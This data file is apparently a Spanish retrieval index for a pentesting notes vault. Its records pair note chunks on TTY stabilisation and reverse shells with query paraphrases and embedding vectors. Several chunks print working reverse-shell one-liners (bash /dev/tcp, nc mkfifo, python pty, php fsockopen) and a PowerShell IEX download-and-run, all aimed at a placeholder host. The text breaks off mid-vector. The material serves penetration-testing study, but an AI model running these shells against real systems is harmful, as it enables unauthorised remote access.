-0.12429, -0.05572, -0.02624, -0.00533, 0.02895, -0.06085, -0.01112, 0.10006, 0.00452, -0.07515, -0.19107, -0.03891, 0.00529, -0.09112, -0.11684, 0.00824, 0.02604, 0.0133, -0.01119, -0.04714, -0.01968, 0.08977, -0.03795, -0.03782, 0.041, -0.00809, -0.00977, -0.04899, 0.04417, -0.14553, 0.03075, -0.0048, -0.0244, -0.01267, -0.04526, 0.02781, -0.13466, 0.02862, -0.02302, 0.04004, 0.03227, 0.05302, 0.01825, 0.05728, -0.05712, -0.00304, -0.04649, -0.0073, -0.01976, 0.01897, -0.11285, -0.02136, 0.07274, 0.00477, -0.00383, 0.0435, -0.02759, -0.00264, -0.01093, -0.04025, -0.01646, -0.02436, 0.00637, 0.03775, -0.03614, -0.00323, -0.0421, 0.05394, -0.01174, 0.03034, -0.0241, -0.03542, -0.0336, 0.03575, -0.04208, 0.02856, 0.05181, -0.03398, 0.06473, -0.00221, -0.01459, -0.00964, 0.08005, 0.04104, -0.02806, -0.00229, -0.06611, 0.04571, 0.01564, -0.0408, 0.00408, 0.03709, 0.03098, 0.04378, 0.07227, -0.03189, 0.01656, -0.0091, 0.02235, -0.01017, -0.04174, 0.0252, 0.00629, -0.01977, -0.01174, -0.01681, -0.03172, 0.03025, 0.00325, -0.05498, -0.04977, -0.00413, 0.00823, -0.03841, -0.03035, -0.04237, -0.03301, -0.03147, -0.02598, 0.02972, -0.07112, -0.0537, 0.0272, 0.06268, -0.0111, 0.00975, -0.01595]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Por quΓ©\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacciΓ³n) fallan.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "ΒΏhay alguna alternativa a las herramientas de pentesting que requieren acceso a la terminal?", "v": [-0.00262, 0.18147, -0.11409, -0.13695, -0.01007, -0.03361, -0.0766, -0.03733, -0.05863, 0.09326, -0.17394, 0.01727, 0.03775, 0.04406, 0.13909, 0.05939, -0.08755, -0.10473, 0.24561, -0.08511, -0.15283, 0.07025, -0.14146, 0.05505, -0.07, -0.01021, 0.05756, -0.00638, -0.16837, 0.00432, 0.04199, -0.0521, 0.07127, 0.0014, -0.07103, -0.04446, 0.03891, 0.0721, 0.10904, 0.09226, 0.03241, -0.1236, -0.08007, 0.10068, 0.01795, -0.07673, -0.08678, 0.09935, 0.01258, 0.0478, -0.06865, -0.0757, -0.08872, 0.04958, 0.10263, -0.00762, 0.17597, -0.11115, 0.04609, -0.11448, -0.0989, 0.07499, -0.04456, 0.03219, 0.03423, 0.02285, -0.03479, -0.03309, -0.07227, 0.18281, -0.05098, -0.00836, 0.07056, 0.04232, -0.03437, 0.02642, -0.03954, 0.07969, 0.06287, 0.06116, -0.0045, 0.04818, -0.00269, 0.01044, -0.0672, -0.12352, 0.00075, 0.00801, 0.03009, -0.01228, 0.02468, 0.07739, 0.00678, 0.08519, -0.04875, -0.00856, -0.10168, -0.00543, 0.01633, -0.00014, 0.10106, 0.04609, 0.03447, 0.01233, -0.04456, -0.03897, -0.04635, -0.02258, -0.01415, -0.03899, 0.03549, 0.10316, 0.10523, 0.01827, -0.04433, -0.05491, -0.03482, -0.01874, -0.08966, -0.12939, 0.03059, -0.00633, -0.02723, -0.0311, 0.0285, -0.00755, 0.01129, 0.02594, 0.03733, -0.00711, 0.07003, -0.09739, 0.0011, -0.09024, -0.07311, -0.06125, 0.06706, -0.13363, -0.02309, 0.02288, -0.0323, 0.02202, -0.06607, -0.09501, 0.03639, -0.04742, -0.05721, -0.03248, -0.02166, -0.09884, -0.06034, -0.07391, -0.04202, 0.0465, -0.03337, 0.04326, 0.03144, 0.01642, -0.10621, 0.06102, -0.08359, -0.0881, -0.04783, 0.00079, -0.03816, -0.01153, -0.01689, 0.01857, -0.03415, 0.0009, 0.05597, 0.01767, 0.01972, 0.02941, 0.03035, -0.01375, -0.04097, -0.03251, 0.02498, 0.01423, 0.04771, -0.03672, -0.07012, -0.01178, 0.06044, -0.08179, 0.02447, -0.01574, 0.01642, 0.05625, 0.02827, -0.02353, -0.07406, -0.05209, 0.01217, 0.01858, 0.03678, -0.03711, -0.04136, -0.00432, -0.02145, 0.07359, 0.04342, -0.04831, 0.06334, 0.02695, -0.09436, -0.02841, 0.00864, 0.05851, 0.03712, 0.01176, 0.01002, 0.02101, 0.00444, -0.04696, -0.03789, 0.05483, 0.02918, 0.03407, 0.00023, 0.00363, 0.0007, 0.07966, 0.01505, 0.03281, 0.02349, 0.05301, -0.01752, -0.01544, 0.03605, -0.00937, -0.03196, 0.04907, -0.01968, -0.05233, 0.02057, -0.03259, 0.02225, 0.00903, 0.04514, 0.03051, 0.05945, 0.05196, -0.05138, 0.02579, -0.03464, -0.03891, -0.05328, 0.02106, -0.00035, -0.02296, 0.01543, 0.02983, 0.02197, 0.04221]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Por quΓ©\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacciΓ³n) fallan.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "ΒΏquΓ© programas sirven para realizar exploits en Linux sin necesidad de interacciΓ³n con el usuario?", "v": [-0.08975, 0.0838, -0.142, -0.22437, 0.03606, -0.18226, -0.22567, 0.05801, -0.0205, -0.02945, 0.08695, -0.06712, -0.0027, -0.01209, -0.02692, -0.10645, -0.01692, -0.03933, -0.00045, -0.04028, -0.10831, 0.1227, -0.04682, 0.01976, -0.00784, 0.06952, 0.04447, -0.14442, 0.05548, 0.05567, -0.10639, 0.09625, 0.03997, -0.02765, -0.01817, 0.02237, 0.01689, -0.01073, 0.18718, 0.15356, 0.09313, -0.02983, -0.10195, 0.03297, 0.02204, -0.01954, -0.01292, -0.06094, 0.0422, -0.03059, 0.05439, 0.03482, -0.1751, -0.04548, 0.0707, -0.05052, 0.09722, -0.20265, 0.04175, -0.00085, -0.18832, -0.01752, 0.03324, -0.01978, 0.09521, -0.07971, -0.02174, 0.01782, -0.09964, 0.13864, 0.01313, 0.10152, -0.07434, -0.00389, 0.0338, 0.03886, -0.08405, 0.00833, 0.00167, 0.02854, 0.01836, 0.04546, 0.02106, 0.00765, -0.05064, -0.10935, 0.13865, 0.02771, -0.01323, -0.00287, 0.05746, 0.10981, 0.01355, 0.02362, 0.11371, -0.07985, 0.04815, 0.05233, 0.03855, 0.09792, -0.04448, -0.04575, -0.10453, 0.09664, -0.09223, 0.0072, 0.04581, -0.0706, -0.06508, -0.04061, 0.07411, -0.07178, 0.01269, -0.03704, -0.05448, 0.03879, -0.08092, -0.07913, -0.01188, -0.09225, -0.09982, 0.05615, -0.03812, -0.01799, 0.01312, -0.00419, -0.02554, 0.13856, -0.01308, -0.07284, 0.00944, -0.10063, 0.02103, 0.03122, 0.01457, -0.05332, 0.04351, -0.12241, -0.00371, -0.0241, 0.05788, 0.06174, 0.00605, 0.01885, 0.09641, 0.04943, 0.01256, -0.06944, -0.02095, -0.05315, -0.00083, -0.01634, -0.03977, 0.01037, -0.06221, -0.08115, -0.01366, -0.01294, -0.06334, -6e-05, 0.00137, -0.04424, 0.04619, 0.0181, -0.00968, -0.04957, -0.01776, 0.05442, 0.04661, 0.05386, -0.00266, 0.07903, 0.02218, -0.03387, 0.01301, -0.04489, 0.02709, -0.01164, 0.00778, -0.00332, -0.03719, 0.00543, 0.04479, -0.02024, 0.03733, -0.03799, -0.02598, 0.02514, 0.0036, 0.00297, 0.02745, 0.01962, 0.02719, 0.00129, 0.02227, -0.00021, -0.02952, 0.03435, 0.02106, -0.04034, -0.03067, 0.01994, -0.02029, -0.00187, 0.04504, 0.04807, -0.04061, 0.02349, -0.01115, 0.0343, -0.01208, 0.01368, 0.0545, -0.01667, -0.01303, -0.04582, 0.02087, 0.0688, 0.05935, 0.01574, -0.01987, -0.00883, 0.03882, -0.01571, 0.02054, -0.07069, -0.00194, -0.01867, -0.01835, -0.00903, 0.00504, -0.04897, -0.00969, 0.02931, 0.01388, -0.02135, -0.01566, -0.02772, 0.00601, -0.06588, -0.07369, 0.08896, 0.03558, -0.08698, -0.02155, -0.04708, -0.09846, 0.02169, -0.0544, -0.04497, -0.03542, 0.00011, 0.01365, 0.0195, 0.02277, 0.02579]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "que programa sirve para recibir conexiones de vuelta desde una vΓ­ctima?", "v": [0.03926, 0.13455, -0.1887, -0.13916, -0.04885, -0.09726, -0.0473, -0.05844, 0.07934, -0.11929, 0.05441, -0.17708, 0.07042, 0.03118, -0.00293, 0.02059, 0.12666, 0.05515, 0.15286, -0.04112, 0.04565, 0.02584, 0.09253, -0.1182, -0.08211, 0.14476, 0.06314, 0.01798, 0.03503, 0.00448, 0.04639, -0.17001, -0.01505, 0.03945, 0.07271, 0.00099, 0.01054, 0.0645, 0.10334, 0.03355, 0.1024, -0.04167, -0.02428, -0.03758, 0.11867, -0.05014, -0.0205, -0.01724, 0.05893, -0.00077, -0.04043, -0.00729, -0.14578, -0.18696, -0.04658, -0.03067, -0.00621, -0.15198, 0.05724, 0.02011, 0.04363, -0.02304, 0.0356, 0.01849, 0.05653, -0.0834, 0.13131, 0.00381, -0.0784, -0.00782, -0.05587, 0.00296, 0.05059, -0.0363, -0.04483, -0.10637, 0.01425, 0.05812, 0.01815, 0.01989, 0.03745, 0.00266, -0.08923, 0.01287, -0.05306, 0.11926, 0.10841, 0.00648, 0.07589, -0.06278, 0.04725, 0.01681, 0.02767, 0.05381, 0.01597, -0.08906, 0.00627, -0.05745, -0.00505, 0.04091, 0.13987, -0.08947, 0.00327, 0.0994, -0.007, 0.0357, 0.04531, 0.02952, -0.1207, 0.04749, -0.03907, 0.08155, 0.00361, -0.04715, -0.1095, -0.068, -0.05306, -0.01314, 0.02672, 0.0106, 0.01352, 0.05761, 0.02859, 0.03596, 0.00839, 0.06062, 7e-05, 0.00219, -0.00111, 0.05726, 0.04761, 0.02926, 0.01275, -0.04063, 0.0071, -0.08289, 0.12885, -0.04423, 0.03097, -0.04329, 0.13697, 0.09104, -0.01372, 0.01078, -0.06261, -0.05174, 0.08213, -0.0412, -0.02095, 0.03236, 0.05043, -0.00714, -0.00574, -0.0028, -0.07098, -0.02833, -0.06032, -0.04396, 0.00679, 0.07349, -0.04174, -0.00378, -0.03157, -0.02632, 0.05881, -0.08837, -0.0326, -0.03654, 0.14552, 0.10527, -0.02713, 0.03632, 0.0191, -0.00078, -0.07842, -0.09496, 0.0238, -0.07713, -0.00674, -0.01279, -0.04348, -0.00703, 0.00957, -0.01651, 0.01417, 0.01238, -0.07274, 0.04499, 0.01891, 0.04878, -0.02039, 0.02505, 0.00242, 0.04671, -0.00968, -0.05306, -0.01759, 0.06978, -0.00666, -0.02188, -0.11308, 0.03319, 0.02134, 0.01099, 0.04053, 0.09438, -0.02468, -0.05981, 0.03372, 0.11799, 0.03691, 0.02892, 0.02508, -0.00081, 0.03144, -0.04291, 0.00847, 0.01885, 0.0462, 0.14048, -0.04183, -0.07499, -0.07985, 0.08777, 0.07089, -0.07144, -0.01247, 0.02635, -0.02568, -0.05846, -0.02379, -0.03005, -0.00395, -0.04637, -0.00587, -0.0658, -0.02293, -0.00807, -0.04241, -0.01268, -0.04894, 0.05049, -0.00838, -0.01686, 0.01722, 0.02765, -0.03245, -0.00849, -0.03884, -0.00918, -0.03318, 0.05289, 0.07576, -0.0446, -0.01238, -0.01376]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "cual herramienta me permite capturar cuando alguien vuelve a conectarse?", "v": [0.06535, 0.23133, -0.13088, -0.11876, -0.02191, -0.09698, -0.06736, 0.0617, -0.00566, -0.11993, -0.06636, -0.07201, -0.04619, 0.04438, 0.05814, 0.06014, 0.0599, 0.10029, 0.07397, -0.05725, 0.00795, 0.04233, -0.04111, -0.19795, -0.01417, -0.11598, 0.10892, 0.05859, -0.17577, -0.06036, -0.03575, -0.03634, 0.07636, 0.01025, -0.06633, -0.08963, -0.05187, 0.13865, 0.0341, 0.04972, -0.00039, 0.09296, -0.1239, 0.0553, 0.05946, -0.03144, 0.00918, -0.04323, 0.02351, 0.051, -0.0989, -0.05171, -0.16965, -0.05922, -0.06592, -0.02966, 0.25691, -0.00565, 0.04969, -0.0864, -0.08414, -0.02673, -0.07933, -0.05537, -0.03402, -0.08963, -0.00077, -0.03671, -0.12481, 0.09536, 0.10965, 0.07396, 0.06844, 0.03773, 0.03737, -0.01951, 0.05148, -0.03428, 0.08898, -0.00736, -0.00878, -0.07209, -0.0549, 0.00202, -0.01898, 0.00107, 0.07996, 0.01138, -0.01004, -0.09357, 0.02521, 0.00241, 0.00345, -0.09095, 0.02567, 0.00593, -0.01278, -0.04097, -0.08071, 0.00649, 0.10661, -0.01713, -0.13016, 0.0906, -0.08684, -0.01219, -0.0318, 0.01198, -0.12094, 0.06446, 0.02122, 0.0554, 0.02576, 0.03538, -0.02147, 0.0847, 0.03569, -0.09645, -0.01922, -0.08898, 0.00022, 0.03003, -0.03738, -0.10891, 0.03515, 0.06826, -0.01854, 0.02496, 0.02863, -0.06528, 0.0039, -0.02124, 0.04731, -0.03755, -0.00786, -0.05536, 0.0923, -0.10843, -0.04945, -0.08878, -0.03735, -0.01195, -0.01902, -0.09115, 0.0043, 0.06075, 0.06001, -0.02304, -0.03518, 0.03105, 0.01168, -0.01251, -0.05479, 0.01223, 0.02701, 0.05894, -0.00377, 0.00349, -0.10656, 0.00185, -0.01823, -0.03004, 0.05469, -0.03023, -0.01784, -0.04433, -0.01557, -0.06096, 0.06473, 0.0659, 0.03512, -0.06261, 0.0406, 0.02816, 0.02186, -0.10061, -0.01919, -0.00633, 0.02542, -0.12791, -0.05455, 0.04437, 0.05528, -0.06999, 0.0483, 0.03938, -0.01467, 0.03085, -0.0419, 0.01973, -0.02638, -0.02109, -0.03554, -0.05254, 0.05833, -0.06664, 0.00257, -0.00963, 0.05914, 0.02472, -0.01949, -0.07022, -0.00715, -0.00154, 0.03047, 0.02797, -0.03162, -0.01804, -0.05262, -0.03391, 0.00905, 0.0635, 0.0597, -0.04285, -0.00507, -0.04568, -0.02729, 0.01167, -0.02821, 0.04781, -0.01678, -0.02498, 0.02005, 0.13528, -0.00464, -0.01365, 0.00617, -0.0064, -0.05218, -0.06562, 0.00502, -0.01877, -0.02807, -0.00954, -0.0278, -0.0587, -0.02736, -0.07697, -0.06655, -0.01213, 0.01332, 0.0544, -0.0056, -0.01652, -0.00054, -0.03165, 0.02416, 0.01777, -0.03556, -0.08981, 0.00835, 0.04772, 0.067, -0.02619, 0.04452, 0.01232]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "con que puedo montar un punto de escucha para recibir conexiones entrantes?", "v": [0.14874, 0.24696, -0.24751, -0.14278, -0.06576, 0.0071, -0.05232, 0.11112, -0.08895, -0.08052, -0.0795, 0.02688, 0.02505, 0.02224, 0.0123, 0.10175, 0.07936, 0.11541, 0.01463, -0.04871, -0.00256, -0.00966, 0.0121, -0.0915, 0.00504, 0.1263, 0.06774, 0.01396, 0.03066, 0.04943, 0.06631, -0.02367, -0.03626, 0.16979, 0.01279, -0.14958, -0.01536, 0.15591, 0.1276, 0.0283, -0.03664, 0.00381, -0.02966, 0.04181, 0.15038, -0.0158, 0.02443, -0.01386, 0.02069, 0.04612, 0.03492, 0.06471, -0.148, -0.06087, -0.06409, -0.03221, 0.10275, -0.07942, 0.0976, -0.01844, -0.05024, 0.07172, -0.03776, -0.00537, 0.04011, -0.02038, 0.02542, -0.02082, 0.01334, -0.00988, -0.09038, -0.06833, 0.03551, 0.00073, 0.0591, 0.07496, -0.00685, -0.03179, 0.06991, 0.0826, 0.02464, -0.04312, 0.00691, -0.05148, -0.05032, 0.04195, 0.03217, -0.04773, -0.02761, 0.0168, 0.07326, 0.05075, 0.04161, 0.00743, -0.0268, -0.10135, -0.11776, 0.04386, -0.0483, -0.05005, -0.0019, 0.04276, -0.03087, 0.20177, 0.03352, -0.03963, 0.09558, -0.08853, 0.08471, -0.03981, -0.03766, 0.10643, -0.0288, -0.05097, -0.15918, -0.14017, -0.09212, 0.02827, -0.00568, 0.02628, 0.00721, 0.01759, 0.06166, 0.07372, -0.04636, -0.0245, 0.08379, 0.03153, 0.01479, 0.03196, 0.02269, 0.00471, 0.02581, -0.08599, 0.05843, -0.05612, -0.03644, -0.09304, -0.01019, -0.00527, 0.09918, -0.0042, -0.01341, 0.03445, -0.01376, 0.03117, 0.01359, -0.04672, -0.05528, -0.02782, -0.02912, 0.06968, -0.00955, -0.00132, 0.01547, -0.00043, 0.08325, -0.01955, 0.10273, 0.07648, -0.00898, 0.05568, -0.02488, -0.06748, -0.0381, -0.05339, -0.09706, -0.00624, 0.03211, -0.0155, -0.11418, 0.01313, 0.03913, -0.0275, -0.07705, 0.0205, -0.06637, -0.02091, 0.07335, 0.03091, -0.04312, -0.03632, -0.0877, -0.03901, 0.00389, 0.05207, -0.00393, 0.01835, -0.00344, 0.09093, -0.02642, -0.01466, 0.00816, 0.03967, 0.04483, -0.04834, 0.04298, 0.02017, -0.0589, -0.0117, -0.0385, 0.0233, 0.03184, -0.02326, 0.04383, 0.02853, -0.02382, 0.02984, 0.0498, 0.07925, 0.09431, -0.05625, -0.04138, -0.03836, -0.00705, -0.02443, -0.01803, 0.0152, -0.08999, 0.10793, -0.02111, 0.05692, 0.0509, 0.05323, 0.05485, 0.03795, -0.02795, -0.01516, 0.05997, 0.03547, -0.04719, 0.01924, -0.01295, -0.03275, -0.01661, -0.01217, -0.03047, 0.03293, -0.03773, 0.00261, 0.03454, 0.07607, 0.00687, 0.019, -0.03163, -0.03599, -0.05456, 0.03404, -0.00513, -0.04956, -0.00531, -0.01449, 0.02366, -0.03299, 0.04471, -0.02194]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Windows (PowerShell, interactiva con ConPtyShell)\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\nEl script se sirve desde tu HTTP (Transferencia de ficheros).", "indexar": "quΓ© herramienta me permite ejecutar comandos en la consola de Windows?", "v": [0.05517, 0.06616, -0.11735, -0.15869, 0.00546, -0.15651, -0.02953, -0.10344, -0.03171, -0.11866, -0.1412, 0.01807, 0.0337, -0.11384, -0.00977, 0.05873, 0.14422, -0.07918, -0.0419, 0.01147, 0.04009, -0.08574, -0.03157, -0.04787, -0.0069, 0.02099, 0.12051, 0.0378, -0.13329, -0.051, -0.07319, -0.02006, 0.06057, -0.06939, -0.04727, 0.01833, -0.13883, 0.02668, 0.02928, 0.07097, -0.00976, 0.11404, -0.10095, 0.04572, 0.07201, -0.09735, 0.09381, -0.0173, 0.08975, -0.01272, 0.0005, -0.1062, -0.06574, -0.01276, 0.04694, -0.12822, 0.20634, -0.07143, 0.07078, -0.01829, -0.08491, -0.02104, 0.01226, 0.09979, -0.00798, 0.04233, -0.04386, -0.15464, -0.00053, 0.17596, -0.14648, 0.01498, 0.01458, 0.03556, 0.02595, -0.05456, -0.10327, -0.03685, 0.14441, -0.03793, 0.06026, -0.02685, -0.11049, -0.02326, 0.03213, -0.11532, -0.04182, -0.04998, 0.00192, -0.11757, 0.03119, -0.07966, -0.04367, 0.07991, 0.08529, 0.00721, 0.06695, -0.03103, 0.02596, 0.02809, 0.06671, -0.07215, -0.13545, 0.11135, -0.02283, 0.03251, -0.04004, -0.06837, -0.05045, -0.01273, 0.03992, 0.04315, 0.00287, 0.00555, -0.03004, 0.02474, -0.033, -0.08185, 0.03694, -0.01059, -0.05271, 0.08837, -0.04633, -0.02181, -0.00878, -0.05337, -0.08926, 0.07661, -0.04078, -0.02291, -0.00683, -0.09721, 0.04161, -0.02533, -0.05084, 0.10693, 0.00869, -0.07532, -0.02771, -0.15187, 0.07917, 0.08191, 0.02146, -0.06256, 0.06664, 0.02277, 0.07591, 0.02841, -0.02342, -0.01769, 0.10008, -0.02661, -0.03645, -0.00391, -0.00714, 0.01588, -0.01521, 0.12397, -0.07849, 0.04035, -0.02796, -0.04994, -0.06352, -0.00947, 0.00993, -0.04549, -0.02008, 0.05386, 0.01159, 0.01733, 1e-05, 0.03089, 0.02239, 0.01097, 0.03212, -0.04028, -0.02709, 0.05276, -0.00814, -0.04954, -0.06349, 0.05774, -0.01561, -0.06555, -0.02822, -0.04432, -0.05954, -0.01544, -0.02836, -0.0016, -0.03167, 0.0695, 0.02432, -0.10354, 0.05005, 0.01984, -0.0145, -0.06019, -0.03386, -0.02124, -0.02237, 0.02344, -0.00165, -0.08054, 0.06327, 0.041, -0.03134, 0.04129, 0.01414, 0.02404, 0.02941, 0.05229, 0.03557, 0.02772, 0.01207, -0.07712, 0.03361, 0.01296, -0.00071, -0.04504, 0.02333, -0.01694, 0.09503, -0.06749, -0.02802, -0.0095, -0.05075, -0.00476, 0.00408, -0.0585, 0.04745, -0.01843, 0.00555, -0.02197, 0.02056, -0.03446, 0.01755, -0.03451, -0.02126, -0.00717, -0.0457, 0.03859, 0.01114, -0.08953, -0.04473, -0.08149, -0.02178, -0.0332, -0.03955, -0.05975, -0.00341, -0.00794, 0.03559, -0.05673, -0.06099, 0.01834]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Windows (PowerShell, interactiva con ConPtyShell)\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\nEl script se sirve desde tu HTTP (Transferencia de ficheros).", "indexar": "con quΓ© puedo acceder a una consola interactiva remota desde mi equipo?", "v": [0.04309, 0.08301, -0.24814, -0.03544, 0.03755, -0.10618, -0.04599, 0.01211, -0.0946, -0.08592, -0.13596, -0.03053, 0.0914, -0.00366, 0.1238, 0.03582, 0.13737, 0.05663, 0.0295, 0.00136, 0.10757, -0.033, 0.01047, -0.07064, 0.09967, -0.06666, 0.14752, 0.07092, 0.05013, -0.13977, -0.03917, -0.0567, 0.07852, 0.00033, -0.02139, -0.07293, 0.01401, 0.09073, 0.10434, -0.13311, 0.01615, 0.01241, -0.11608, -0.07175, 0.20415, -0.02985, 0.07014, -0.00118, -0.01472, 0.01347, -0.10722, -0.02454, -0.01155, -0.09846, -0.03773, -0.06167, 0.17481, -0.13388, 0.10942, -0.03507, -0.04394, -0.04462, -0.03132, 0.02752, 0.02907, 0.01991, -0.12671, -0.13721, -0.11139, 0.06466, -0.14114, -0.05649, 0.01884, -0.06832, -0.0297, 0.03348, -0.07703, -0.05479, 0.116, -0.03973, 0.00615, -0.03474, -0.01948, -0.04597, 0.01711, -0.06005, 0.05465, -0.05058, -0.00167, -0.13991, 0.06271, -0.08559, -0.05771, 0.02805, -0.04122, -0.01574, 0.05244, -0.00296, 0.00343, -0.04358, -0.0515, 0.08313, -0.09033, 0.12303, -0.05375, 0.00201, 0.0749, 0.01108, -0.03392, -0.03463, 0.07171, -0.00052, -0.08178, -0.00359, -0.02769, 0.06152, -0.17119, -0.01277, 0.05724, 0.045, -0.03313, -0.01378, 0.00557, -0.08499, 0.02506, -0.04742, -0.01662, 0.00798, 0.0146, 0.02607, -0.05672, -0.07446, 0.0143, -0.03356, 0.0062, 0.01422, -0.06245, -0.08925, -0.0146, -0.02072, 0.0403, 0.09067, 0.02038, -0.07466, 0.03666, -0.00392, 0.0475, -0.00472, -0.01281, 0.0316, -0.01889, -0.02539, 0.01777, 0.02888, 0.03347, 0.10017, 0.06255, 0.0239, -0.10316, 0.02053, -0.05361, -0.07241, -0.03779, -0.00026, -0.03349, -0.03533, -0.10849, -0.05067, 0.02812, 0.0056, -0.15625, 0.03662, 0.05078, -0.05745, 0.0097, 0.00148, 0.00246, 0.0003, -0.00474, -0.09102, -0.04666, 0.00645, -0.04236, -0.05954, -0.04805, -0.00986, -0.02472, -0.04424, -0.00318, -0.00395, -0.01801, 0.04896, -0.00109, -0.01338, 0.06707, 0.00931, -0.05197, -0.01326, -0.02742, 0.00219, 0.02624, 0.02718, 0.01245, 0.03801, 0.03369, 0.0093, -0.0052, 0.01945, 0.00514, 0.01917, 0.08613, 0.0444, 0.05673, 0.04793, 0.02231, -0.04035, 0.03452, -0.0401, -0.00247, 0.07019, 0.05571, 0.03095, 0.08014, -0.05438, -0.00277, 0.04717, 0.01854, 0.04821, -0.00562, -0.08559, 0.04832, 0.01331, 0.04301, 0.01037, -0.00955, -0.03591, 0.0092, -0.04111, -0.02819, 0.02426, 0.00894, 0.07882, -0.03139, -0.00641, -0.00311, -0.11043, -0.05007, 0.02365, -0.03013, -0.07163, -0.06593, -0.02199, 0.03884, -0.02261, -0.03281, 0.01604]} +{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "que comando bash sirve para abrir una shell remota sin usar el parΓ‘metro -e?", "v": [0.01187, -0.0943, -0.19176, -0.12706, -0.0502, -0.11396, -0.02042, -0.08923, -0.02771, 0.00859, -0.20777, -0.06822, 0.10356, -0.0804, 0.01761, 0.03695, -0.00732, 0.11978, 0.03119, -0.07771, 0.08992, 0.05093, 0.00832, -0.04622, -0.05724, 0.04132, 0.04749, -0.04703, -0.16156, -0.09653, -0.03043, -0.02076, 0.09243, -0.06669, -0.0211, 0.04958, 0.04835, -0.03708, 0.00886, 0.18541, -0.07278, 0.04369, -0.14906, 0.09575, 0.10404, -0.08341, 0.10955, -0.01795, -0.00852, 0.03921, -0.04432, -0.059, -0.12944, 0.08463, 0.03346, -0.00025, 0.13221, -0.06764, -0.02416, -0.00891, -0.10665, -0.11134, 0.08112, 0.08367, -0.05503, -0.10579, -0.05255, -0.14484, -0.12058, 0.02942, -0.08891, 0.0396, -0.08957, 0.09499, -0.00815, 0.04708, -0.1448, -0.04566, 0.1341, 0.05966, -0.06488, 0.02017, 0.02024, -0.03078, -0.06274, -0.14506, 0.04535, -0.00948, 0.02249, -0.00122, 0.01176, 0.04705, 0.00998, 0.048, 0.07646, -0.01132, -0.04936, 0.04327, -0.03793, 0.02085, 0.11388, -0.0826, -0.06593, 0.12495, -0.00972, -0.01297, 0.07536, -0.06788, -0.01181, 0.0558, 0.10219, -0.09399, -0.01113, -0.03291, -0.06967, -0.07213, -0.09891, -0.07705, -0.03464, -0.03488, -0.07251, -0.03592, -0.01592, 0.08049, -0.01102, -0.04849, -0.0085, 0.06982, 0.0763, 0.0479, -0.00193, -0.01706, 0.03816, -0.0209, -0.03085, 0.09876, -0.01271, -0.04123, -0.08246, -0.07916, -0.00376, 0.09072, -0.09719, 0.00677, 0.04793, -0.01706, 0.04105, -0.03538, -0.07853, -0.03602, 0.06227, -0.00317, -0.0311, 0.03645, -0.07082, -0.0465, 0.01403, -0.0167, -0.01527, -0.00846, -0.01345, -0.07782, -0.04694, 0.02591, -0.00409, -0.08684, -0.01916, -0.05586, 0.04727, 0.05305, 0.00485, 0.09465, 0.03128, -0.00195, 0.0441, -0.03602, 0.01958, -0.04433, -0.03507, 0.00714, 0.03659, -0.00313, 0.00254, -0.02346, -0.02497, 0.04954, 0.01583, -0.0393, -0.06308, 0.01966, -0.02014, 0.02397, 0.01254, -0.02994, 0.01069, 0.01318, 0.02487, -0.04058, 0.00911, -0.01374, -0.0222, 0.07255, -0.01026, -0.09409, 0.08736, -0.0589, -0.04332, 0.05197, 0.01522, 0.01232, 0.00126, -0.03203, 0.01885, 0.04325, -0.03446, -0.01783, 0.00068, 0.01137, -0.01595, 0.01491, -0.04498, 0.02732, 0.00025, 0.0386, 0.04506, 0.07586, -0.04109, -0.05412, 